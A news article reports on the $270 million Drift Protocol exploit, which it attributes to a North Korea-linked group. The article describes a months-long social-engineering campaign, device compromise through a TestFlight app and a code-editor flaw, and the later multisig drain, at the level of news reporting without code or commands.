A six-month intelligence operation preceded the exploitation of the $270 million Drift Protocol and was carried out by a North Korean state-linked group, according to a detailed incident update released by the team earlier Sunday.
The attackers first made contact around the fall of 2025 at a major crypto conference, presenting themselves as a quantitative trading firm looking to integrate with Drift.
They were technically fluent, had verifiable professional backgrounds and understood how the protocol worked, Drift said. A Telegram group was established and what followed were months of substantive conversations around trading strategies and vault integrations, interactions that are standard for how companies trade onboard DeFi protocols.
Between December 2025 and January 2026, the group boarded an Ecosystem Vault on Drift, held several work sessions with contributors, deployed over $1 million of their own capital, and built a working operational presence inside the ecosystem.
Drift contributors met people from the group face-to-face at several major industry conferences in several countries throughout February and March. When the attack started on April 1, the relationship was almost half a year old.
The compromise appears to have come through two vectors.
Another downloaded a TestFlight application, Apple’s platform for distributing pre-release apps that bypass App Store security review, which the group presented as their wallet product.
For the storage vector, Drift pointed to a known vulnerability in VSCode and Cursor, two of the most widely used code editors in software development, that the security community had flagged since late 2025, where simply opening a file or folder in the editor was sufficient to silently execute arbitrary code without any prompt or warning.
Once devices were compromised, the attackers had what they needed to obtain the two multisig credentials that enabled the durable nonce attack CoinDesk described earlier this week. These pre-signed transactions sat dormant for more than a week before being executed on April 1, draining $270 million from the protocol’s vaults in under a minute.
The attribution points to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet, based on both on-chain fund flows tracing back to the Radiant Capital attackers and operational overlap with known DPRK-linked personas.
However, the individuals who appeared in person at conferences were not North Korean citizens. DPRK threat actors at this level are known to deploy third-party intermediaries with fully constructed identities, employment histories, and professional networks built to withstand due diligence.
Drift encouraged other protocols to revise access control and treat any device touching a multisig as a potential target. The broader implication is uncomfortable for an industry that relies on multisig management as its primary security model.
But if attackers are willing to spend six months and a million dollars building a legitimate presence in an ecosystem, meeting teams in person, contributing real capital and waiting, the question is what security model is designed to capture it.
